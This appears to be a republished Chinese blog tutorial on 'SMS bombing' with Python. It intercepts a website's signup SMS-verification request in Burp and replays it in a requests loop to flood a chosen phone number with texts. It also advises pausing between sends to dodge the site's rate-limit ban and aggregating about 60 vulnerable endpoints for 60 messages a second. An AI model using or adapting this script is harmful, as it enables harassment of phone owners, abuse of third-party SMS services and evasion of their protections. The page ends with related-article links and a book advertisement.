内容简介:使用python进行短信轰炸
本文作者:i春秋作家——Hacker1ee
大家好,我是1ee(因为在作家群,就不加Hacker这个前缀了,怕被大佬打。。)
刚加入i春秋作家组希望大家多多关照,也欢迎大家找我交流
今天我来讲讲我最近找到的一个小思路,利用 python 进行短信轰炸
首先
这是一个网站,他的业务存在短信发送
这个时候,我们打开神器burp或者其他抓包工具(最好用burp,因为repeater模块可以满足我们的需要)
这时候我给我的火狐挂上代理,然后burp开启拦截
抓到了一个包,发送到repeater
进入repeater分析数据包
{"mobile":"13xxxxxx","type":"signup"}
这个是发送的数据,go走起
看返回的包可以看到是成功的
然后开始写我们的python进行循环发包对目标进行轰炸
import requests import json headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0','Cookie': 'da_a=77206194','Referer': 'http://www.demlution.com/'} #data = #print data r = requests.post('/capi/v1/dmhome/send_token',data=json.dumps({"mobile":"手机号码","type":"signup"}),headers=headers) print(r.text)
先进行测试,测试完成后可以for循环加强脚本的威力,经过我的研究发现当一个号码多次提交后会被ban,如我一次性发了10个包后(也就是发了十条短信)之后的这个号码就不会再发了,即使返回的包状态是成功,但是短信是发不到的,其实我们可以停顿十秒再发下一个,这样就不会被ban,这也是测试知道的
好了,今天我就说道这吧,可能大家会说就一个号码我直接加入黑名单就ok了,的确,但是我们可以挖掘这类型的网站,然后一个一个接口发送一次,60个接口,一秒钟就60条短信,威力还是可以的,附上成功的图片
>>>>>> 黑客入门必备技能 带你入坑和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩~
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 网站安全检测 针对于手机短信轰炸漏洞的检测与修复办法
- NLP 新纪元?如何看待轰炸阅读理解顶级测试的BERT模型?
- 如何用短信完成XSS?
- 子弹短信内部技术分享:Redis
- 极益发布邮件与短信群发插件
- Laravel SMS 短信发送包
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
高性能MySQL
施瓦茨 (Baron Schwartz)、扎伊采夫 (Peter Zaitsev)、特卡琴科 (Vadim Tkachenko) / 宁海元、周振兴、彭立勋、翟卫祥,刘辉 / 电子工业出版社 / 2013-5-1 / 128.00元
《高性能mysql(第3版)》是mysql 领域的经典之作,拥有广泛的影响力。第3 版更新了大量的内容,不但涵盖了最新mysql 5.5版本的新特性,也讲述了关于固态盘、高可扩展性设计和云计算环境下的数据库相关的新内容,原有的基准测试和性能优化部分也做了大量的扩展和补充。全书共分为16 章和6 个附录,内容涵盖mysql 架构和历史,基准测试和性能剖析,数据库软硬件性能优化,复制、备份和恢复,高可......一起来看看 《高性能MySQL》 这本书的介绍吧!